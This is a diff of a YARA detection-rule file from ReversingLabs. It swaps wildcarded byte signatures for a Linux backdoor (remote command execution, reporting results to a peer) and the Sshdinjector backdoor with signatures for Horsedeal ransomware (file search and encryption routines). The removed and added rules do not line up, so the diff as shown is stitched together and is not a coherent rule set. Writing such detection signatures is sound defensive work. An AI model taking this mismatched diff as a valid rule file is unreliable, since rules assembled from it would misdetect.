-            ?? ?? 77 ?? 0F B7 8D ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ?? 48 89 C7
-            48 89 D6 FC F3 A4 EB ?? 48 8D 85 ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ?? 48 89 C7 48 89 D6
-            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 45 ?? 48 8B 45 ?? 8B 40 ??
-            89 45 ?? 48 8B 45 ?? 8B 50 ?? 48 8B 45 ?? 89 50 ?? 48 8B 55 ?? 8B 45 ?? 89 42 ?? 8B
-            45 ?? 83 C0 ?? 89 45 ?? 8B 45 ?? 48 98 48 89 C2 48 8D 85 ?? ?? ?? ?? 48 01 D0 48 89
-            45 ?? 8B 45 ?? 83 C0 ?? 89 45 ?? 48 8B 45 ?? 0F B7 40 ?? 66 89 45 ?? 48 8B 45 ?? 0F
-            B7 10 48 8B 45 ?? 66 89 50 ?? 48 8B 55 ?? 0F B7 45 ?? 66 89 02 8B 45 ?? 48 98 48 89
-            C2 48 8D 85 ?? ?? ?? ?? 48 01 D0 48 89 45 ?? 48 8B 45 ?? C6 40 ?? ?? 8B 45 ?? 83 C0
-            ?? 89 45 ?? 8B 45 ?? 48 98 48 89 C2 48 8D 85 ?? ?? ?? ?? 48 01 D0 48 89 45 ?? 48 8B
-            45 ?? 66 C7 40 ?? ?? ?? 66 81 BD ?? ?? FF FF ?? ?? 76 ?? 48 8B 45 ?? 48 83 C0 ?? BF
-            ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ?? 49 89 C0 B9 ?? ?? ?? ?? BE ?? ?? ?? ?? E8 ?? ?? ??
-            ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 C2 48 8B 45 ?? 66 89 50 ?? 48 8B 45 ?? 66 C7 40
-            ?? ?? ?? EB ?? 48 8B 45 ?? 48 83 C0 ?? 0F B7 8D ?? ?? ?? ?? BF ?? ?? ?? ?? 48 8B 95
-            ?? ?? ?? ?? 49 89 C0 BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F B7 85 ?? ?? ?? ?? 83 C0 ?? 0F
-        }
-		$send_result_to_peer_v2_p2 = {
-            B7 F8 E8 ?? ?? ?? ?? 89 C2 48 8B 45 ?? 66 89 50 ?? 48 8B 55 ?? 0F B7 85 ?? ?? ?? ??
-            66 89 42 ?? 48 8B 45 ?? 0F B7 40 ?? 83 C0 ?? 0F B7 F8 E8 ?? ?? ?? ?? 89 C2 48 8B 45
-            ?? 66 89 50 ?? 48 8B 45 ?? 0F B7 50 ?? 48 8B 45 ?? 0F B7 40 ?? 8D 04 02 8D 50 ?? 48
-            8B 45 ?? 66 89 50 ?? 48 8B 45 ?? 0F B7 40 ?? 0F B7 F8 E8 ?? ?? ?? ?? 89 C2 48 8B 45
-            ?? 66 89 50 ?? 48 8B 45 ?? 0F B7 40 ?? 0F B7 F8 E8 ?? ?? ?? ?? 66 89 45 ?? 48 8B 45
-            ?? 66 C7 40 ?? ?? ?? 0F B7 4D ?? 48 8B 7D ?? 48 8B 45 ?? 8B 50 ?? 48 8B 45 ?? 8B 70
-            ?? 41 89 C8 48 89 F9 BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 C2 48 8B 45 ?? 66 89 50 ?? 48
-            8B 55 ?? 0F B6 42 ?? 83 C8 ?? 88 42 ?? 0F B7 45 ?? 83 C0 ?? 0F B7 F8 E8 ?? ?? ?? ??
-            89 C2 48 8B 45 ?? 66 89 50 ?? 48 8B 45 ?? 66 C7 40 ?? ?? ?? 0F B7 45 ?? 83 C0 ?? 89
-            C6 48 8D BD ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 C2 48 8B 45 ?? 66 89 50 ?? 48 8B 45 ?? 8B
-            40 ?? 89 85 ?? ?? ?? ?? 66 C7 85 ?? ?? FF FF ?? ?? 48 8B 45 ?? 0F B7 40 ?? 66 89 85
-            ?? ?? FF FF 48 8D 95 ?? ?? ?? ?? 0F B7 45 ?? 48 83 C0 ?? 48 8D B5 ?? ?? ?? ?? 8B BD
-            ?? ?? ?? ?? 41 B9 ?? ?? ?? ?? 49 89 D0 B9 ?? ?? ?? ?? 48 89 C2 E8 ?? ?? ?? ?? C9 C3
-        }
-		$execute_remote_command_v2 = {
-            55 48 89 E5 48 83 EC ?? 48 89 7D ?? 48 89 75 ?? 48 8B 75 ?? 48 8B 7D ?? E8 ?? ?? ??
-            ?? 48 8B 45 ?? 48 C7 C1 ?? ?? ?? ?? 48 89 45 ?? B8 ?? ?? ?? ?? FC 48 8B 7D ?? F2 AE
-            48 89 C8 48 F7 D0 48 83 E8 ?? 48 03 45 ?? 66 C7 00 ?? ?? C6 40 ?? ?? 48 8B 45 ?? 48
-            C7 C1 ?? ?? ?? ?? 48 89 45 ?? B8 ?? ?? ?? ?? FC 48 8B 7D ?? F2 AE 48 89 C8 48 F7 D0
-            48 83 E8 ?? 66 89 45 ?? 48 8B 7D ?? BE ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48
-            98 48 89 45 ?? 48 83 7D ?? ?? 0F 85 ?? ?? ?? ?? 48 8B 7D ?? E8 ?? ?? ?? ?? 48 8B 7D
-            ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F B7 45 ?? 48 89 C7 48 03 7D ?? 48 8B 55 ?? BE ??
-            ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 45 ?? 48 C7 C1 ?? ?? ?? ?? 48 89 45 ??
-            B8 ?? ?? ?? ?? FC 48 8B 7D ?? F2 AE 48 89 C8 48 F7 D0 48 83 E8 ?? 0F B7 C0 89 45 ??
-            EB ?? 48 8B 7D ?? E8 ?? ?? ?? ?? 88 45 ?? 80 7D ?? ?? 74 ?? 0F B7 45 ?? 48 89 C2 48
-            03 55 ?? 0F B6 45 ?? 88 02 66 83 45 ?? ?? 66 81 7D ?? ?? ?? 76 ?? 48 8B 7D ?? B8 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 0F B7 45 ?? 89 45 ?? 8B 45 ?? C9 C3
-        }
-		$main_routine_v2_p1 = {
-            55 48 89 E5 48 81 EC ?? ?? ?? ?? 89 BD ?? ?? ?? ?? 48 89 B5 ?? ?? ?? ?? C7 45 ?? ??
-            ?? ?? ?? 48 8D BD ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 85
-            ?? ?? ?? ?? 48 8B 00 48 C7 C1 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? B8 ?? ?? ?? ?? FC 48
-            8B BD ?? ?? ?? ?? F2 AE 48 89 C8 48 F7 D0 48 83 E8 ?? 48 83 F8 ?? 76 ?? 48 8B 85 ??
-            ?? ?? ?? 48 8B 00 48 C7 C1 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? B8 ?? ?? ?? ?? FC 48 8B
-            BD ?? ?? ?? ?? F2 AE 48 89 C8 48 F7 D0 48 8D 50 ?? 48 8B 85 ?? ?? ?? ?? 48 8B 00 48
-            89 C7 FC 48 89 D1 B8 ?? ?? ?? ?? F3 AA 48 8B 85 ?? ?? ?? ?? 48 8B 00 C7 00 ?? ?? ??
-            ?? C7 40 ?? ?? ?? ?? ?? 66 C7 40 ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ??
-            ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ??
-            75 ?? E8 ?? ?? ?? ?? 8B 38 E8 ?? ?? ?? ?? 48 89 C6 BF ?? ?? ?? ?? B8 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 8D 8D ??
-            ?? ?? ?? 8B 7D ?? 41 B8 ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 85
-            C0 79 ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? EB ?? 48 8D 85 ?? ?? ?? ?? 48 89 C7 BA ?? ??
-            ?? ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D B5 ?? ?? ?? ?? 8B 7D ?? B9 ?? ?? ?? ?? BA
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 7E ?? 48 8D 85 ?? ?? ?? ?? 48 89 45
-            ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 48 98 48 89 C2 48 8D 85 ?? ?? ?? ?? 48 01 D0 48 89
+		$search_files = {
+            55 8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 57 68 ??
+            ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B F9 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ??
+            57 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ??
+            50 FF 15 ?? ?? ?? ?? 8B D8 83 FB ?? 0F 84 ?? ?? ?? ?? EB ?? 8D A4 24 ?? ?? ?? ?? 90
+            8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ??
+            8B B5 ?? ?? ?? ?? 83 FE ?? 0F 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 66 8B
+            10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66
+            85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 74 ?? B8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ??
+            66 8B 11 66 3B 10 75 ?? 66 85 D2 74 ?? 66 8B 51 ?? 66 3B 50 ?? 75 ?? 83 C1 ?? 83 C0
+            ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 74 ?? 8D 85 ?? ?? ?? ?? 50 57 8D
+            85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68
+            ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 83 FE ?? 74 ??
+            68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ??
+            50 57 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 53 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 53
+            FF 15 ?? ?? ?? ?? 8B 4D ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3
         }
-		$main_routine_v2_p2 = {
-            45 ?? 48 8B 45 ?? 0F B7 40 ?? 0F B7 F8 E8 ?? ?? ?? ?? 66 3D ?? ?? 75 ?? 8B 45 ?? 83
-            C0 ?? 89 45 ?? 8B 45 ?? 48 98 48 89 C2 48 8D 85 ?? ?? ?? ?? 48 01 D0 48 89 45 ?? 8B
-            45 ?? 83 C0 ?? 89 45 ?? 48 8B 45 ?? 0F B6 40 ?? 3C ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 48
-            98 48 89 C2 48 8D 85 ?? ?? ?? ?? 48 01 D0 48 89 45 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ??
-            48 8B 45 ?? 48 83 C0 ?? 48 8D 95 ?? ?? ?? ?? 8B 00 89 02 8B 95 ?? ?? ?? ?? 8B 05 ??
-            ?? ?? ?? 39 C2 74 ?? 8B 15 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? BF ?? ?? ?? ?? B8 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 45 ?? 0F B7 40 ?? 0F B7 C8 48 8B 45 ?? 0F B6
-            40 ?? 0F B6 D0 8B 75 ?? BF ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 75 ?? 48
-            83 C6 ?? 48 8B 45 ?? 0F B7 40 ?? 0F B7 C8 48 8B 55 ?? 48 83 C2 ?? BF ?? ?? ?? ?? 49
-            89 F0 BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 45 ?? 0F B6 40 ?? 84 C0 0F 84 ?? ?? ?? ??
-            48 8B 45 ?? 0F B6 40 ?? 3C ?? 75 ?? 48 8B 45 ?? 48 83 C0 ?? 8B 00 89 05 ?? ?? ?? ??
-            48 8D BD ?? ?? ?? ?? FC B9 ?? ?? ?? ?? B8 ?? ?? ?? ?? F3 AA 48 8D 85 ?? ?? ?? ?? 48
+		$encrypt_files_p1 = {
+            55 8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 57 6A ?? 68
+            ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8B F9 68 ?? ?? ?? ?? 57 89 BD ?? ?? ?? ?? FF 15 ?? ??
+            ?? ?? 8B D8 89 9D ?? ?? ?? ?? 83 FB ?? 0F 84 ?? ?? ?? ?? 56 6A ?? 53 FF 15 ?? ?? ??
+            ?? 8B F0 68 ?? ?? ?? ?? 57 89 B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ??
+            ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 E8 ?? ??
+            ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 85
+            C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 68 ?? ??
+            ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4
+            ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 68 ?? ?? ?? ??
+            57 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 85
+            C0 75 ?? 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ??
+            ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 F6 0F 8E ?? ?? ?? ?? 33
         }
-		$main_routine_v2_p3 = {
-            C7 C1 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? B8 ?? ?? ?? ?? FC 48 8B BD ?? ?? ?? ?? F2 AE
-            48 89 C8 48 F7 D0 48 83 E8 ?? 0F B7 C8 4C 8D 8D ?? ?? ?? ?? 8B 45 ?? 0F B7 D0 48 8D
-            B5 ?? ?? ?? ?? 8B 7D ?? 41 89 C8 4C 89 C9 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 45 ??
-            0F B6 40 ?? 3C ?? 0F 85 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 85 C0 75 ?? BE ?? ?? ??
-            ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 05 ?? ?? ?? ?? 48 8B 3D ?? ?? ?? ?? BA ?? ??
-            ?? ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 48 8B 45 ?? 0F B7 40 ?? 0F
-            B7 D0 48 8B 7D ?? 48 83 C7 ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 45 ?? 0F B7 40 ??
-            0F B7 D0 8B 05 ?? ?? ?? ?? 8D 04 02 89 05 ?? ?? ?? ?? 48 8B 45 ?? 0F B7 50 ?? 0F B7
-            05 ?? ?? ?? ?? 66 39 C2 0F 84 ?? ?? ?? ?? 48 8B 3D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 C7
-            05 ?? ?? ?? ?? ?? ?? ?? ?? 48 8D BD ?? ?? ?? ?? FC B9 ?? ?? ?? ?? B8 ?? ?? ?? ?? F3
-            AA 8B 15 ?? ?? ?? ?? 48 8D BD ?? ?? ?? ?? BE ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 48 8D B5 ?? ?? ?? ?? BF ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 85
+		$encrypt_files_p2 = {
+            FF 8D 49 ?? 6A ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 68 ?? ?? ?? ??
+            8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 53 FF 15 ?? ?? ?? ?? 8D 8D ?? ??
+            ?? ?? 33 F6 8D 51 ?? EB ?? 8D 49 ?? 8A 01 41 84 C0 75 ?? 2B CA 74 ?? BB ?? ?? ?? ??
+            8A 84 35 ?? ?? ?? ?? 3C ?? 7C ?? 3C ?? 7F ?? 0F BE C0 83 E8 ?? 99 F7 FB 80 C2 ?? EB
+            ?? 3C ?? 7C ?? 3C ?? 7F ?? 0F BE C0 83 E8 ?? 99 F7 FB 80 C2 ?? 88 94 35 ?? ?? ?? ??
+            8D 85 ?? ?? ?? ?? 46 8D 50 ?? 8A 08 40 84 C9 75 ?? 2B C2 3B F0 72 ?? 8B 9D ?? ?? ??
+            ?? 6A ?? 6A ?? 57 53 FF 15 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8D 51 ?? 8D 9B ?? ?? ?? ??
+            8A 01 41 84 C0 75 ?? 6A ?? 8D 85 ?? ?? ?? ?? 2B CA 50 51 8D 85 ?? ?? ?? ?? 50 53 FF
+            15 ?? ?? ?? ?? 03 BD ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 50 E8 ?? ??
+            ?? ?? 83 C4 ?? 3B BD ?? ?? ?? ?? 0F 8C ?? ?? ?? ?? 8B BD ?? ?? ?? ?? 53 FF 15 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 57 8D 85 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ??
+            5E 8B 4D ?? 5F 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3
         }
 
 	condition:
-		uint32( 0 ) == 0x464C457F and ( ( ( all of ( $send_result_to_peer_v1_p* ) ) and ( $execute_remote_command_v1 ) and ( all of ( $send_reply_v1_p* ) ) and ( $daemon_already_running_check_v1 ) ) or ( ( all of ( $send_result_to_peer_v2_p* ) ) and ( $execute_remote_command_v2 ) and ( all of ( $main_routine_v2_p* ) ) ) )
+		uint16( 0 ) == 0x5A4D and ( $search_files ) and ( all of ( $encrypt_files_p* ) )
 }
-rule REVERSINGLABS_Linux_Backdoor_Sshdinjector : TC_DETECTION MALICIOUS MALWARE FILE
+rule REVERSINGLABS_Win32_Ransomware_Horsedeal : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Yara rule that detects Sshdinjector backdoor."
+		description = "Yara rule that detects Horsedeal ransomware."
 		author = "ReversingLabs"
-		id = "781d7a64-0908-5aa8-a178-cffe52e78036"
-		date = "2025-03-27"
-		modified = "2025-03-27"
+		id = "c722bc5b-756e-5d46-8530-e20ebb73737c"
+		date = "2020-10-01"
+		modified = "2020-10-01"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/backdoor/Linux.Backdoor.Sshdinjector.yara#L1-L197"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Horsedeal.yara#L1-L106"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "9370b59a3317ac14b5791723411216315e480fad7419d248aaed42a19312da0c"
+		logic_hash = "fa8c425b08606399b5dc7673f3898e3dba7efb6a62e56db8f500cf5072bb590b"
 		score = 75
 		quality = 90
 		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
 		category = "MALWARE"
-		tc_detection_type = "Backdoor"
-		tc_detection_name = "Sshdinjector"
-		tc_detection_factor = 5
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Horsedeal"
+		tc_detection_factor = 5
 		importance = 25
 
 	strings:
-		$kill_and_restart_daemons_p1 = {
-            55 48 89 E5 48 81 EC ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 48 8D 55
-            ?? B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 48 89 D7 F3 48 AB 48 89 FA 89 02 48 83 C2 ?? 48 8D
-            95 ?? ?? ?? ?? B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 48 89 D7 F3 48 AB 48 89 FA 89 02 48 83
-            C2 ?? E8 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? C7 00 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? C7
-            40 ?? ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48
-            89 C1 BA ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 89 C6 48 8B 05 ?? ?? ?? ?? 48 89 C7 E8
-            ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C6 48 8D 3D ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 85 C0 0F 95 C0 84 C0 74 ?? 48
-            8D 3D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? C7 00 ?? ?? ?? ?? 48 8B 05 ??
-            ?? ?? ?? C7 40 ?? ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? 48 8D 85 ??
-            ?? ?? ?? 48 89 C1 BA ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 89 C6 48 8D 3D ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C6 48 8D 3D ?? ?? ?? ?? B8 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 85 C0 0F 95 C0 84 C0 74
-        }
-		$kill_and_restart_daemons_p2 = {
-            48 8D 3D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 BA ?? ?? ?? ?? 48
-            8B 05 ?? ?? ?? ?? 48 89 C6 48 8D 3D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ??
-            48 89 C6 48 8D 3D ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48
-            89 C7 E8 ?? ?? ?? ?? 85 C0 0F 95 C0 84 C0 74 ?? 48 8D 3D ?? ?? ?? ?? E8 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 89 45 ?? E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 94 C0 84 C0 0F 84 ??
-            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? EB ?? 8B 45 ?? 89 C7 E8 ?? ?? ?? ?? 83 45 ?? ?? 81 7D
-            ?? ?? ?? ?? ?? 0F 9E C0 84 C0 75 ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 48 8D 45
-            ?? 48 8D 35 ?? ?? ?? ?? 48 89 C7 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7
-            E8 ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 3D ?? ?? ?? ?? E8 ?? ?? ?? ?? BF
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 3D ?? ?? ?? ?? E8 ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 48 8D 3D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 3D ?? ?? ?? ?? E8 ?? ?? ?? ?? BF
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? C9 C3
-        }
-		$network_communication_p1 = {
-            55 48 89 E5 41 54 53 48 81 EC ?? ?? ?? ?? 48 89 BD ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ??
-            48 C7 45 ?? ?? ?? ?? ?? 48 C7 45 ?? ?? ?? ?? ?? 48 C7 45 ?? ?? ?? ?? ?? 48 C7 45 ??
-            ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 8D 78 ?? E8 ?? ?? ?? ?? 48 8D 50 ?? 48 8B 05 ??
-            ?? ?? ?? 48 8D 04 02 48 89 45 ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 66 89 45 ?? 48
-            8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 83 C0 ?? 48 03 45 ?? 48 89 45 ?? 48 8B 45 ?? 48
-            89 C7 E8 ?? ?? ?? ?? 66 89 45 ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 83 C0 ?? 48
-            03 45 ?? 48 89 45 ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 89 C2 48 8B 05 ?? ?? ?? ??
-            66 89 10 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ??
-            ?? ?? ?? ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 48 8D
-            71 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 0F B7 00 0F B7 C8 0F B7 55 ?? 0F
-            B7 45 ?? 41 89 C8 89 D1 89 C2 48 8B 05 ?? ?? ?? ?? 48 8D 70 ?? 48 8D 3D ?? ?? ?? ??
-            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 05
-            ?? ?? ?? ?? 0F B7 00 66 85 C0 0F 84 ?? ?? ?? ?? 44 0F B7 65 ?? 0F B7 5D ?? 48 8D 45
-            ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8D 55 ?? 48 8D 8D ?? ?? ?? ?? 48 8D 45 ?? 48 89 CE 48
-        }
-		$network_communication_p2 = {
-            89 C7 E8 ?? ?? ?? ?? 48 8D 45 ?? 4C 8D 05 ?? ?? ?? ?? B9 ?? ?? ?? ?? 44 89 E2 89 DE
-            48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? EB ?? 89 D3
-            49 89 C4 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 4C 89 E0 48 63 D3 EB ?? 89 D3 49 89 C4
-            48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 4C 89 E0 48 63 D3 48 89 C7 E8 ?? ?? ?? ?? 48 8D
-            45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 44
-            0F B7 65 ?? 0F B7 5D ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8D 55 ?? 48 8D 8D ??
-            ?? ?? ?? 48 8D 45 ?? 48 89 CE 48 89 C7 E8 ?? ?? ?? ?? 48 8D 45 ?? 4C 8D 05 ?? ?? ??
-            ?? B9 ?? ?? ?? ?? 44 89 E2 89 DE 48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? 48 8D 45 ?? 48
-            89 C7 E8 ?? ?? ?? ?? EB ?? 89 D3 49 89 C4 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 4C 89
-            E0 48 63 D3 EB ?? 89 D3 49 89 C4 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 4C 89 E0 48 63
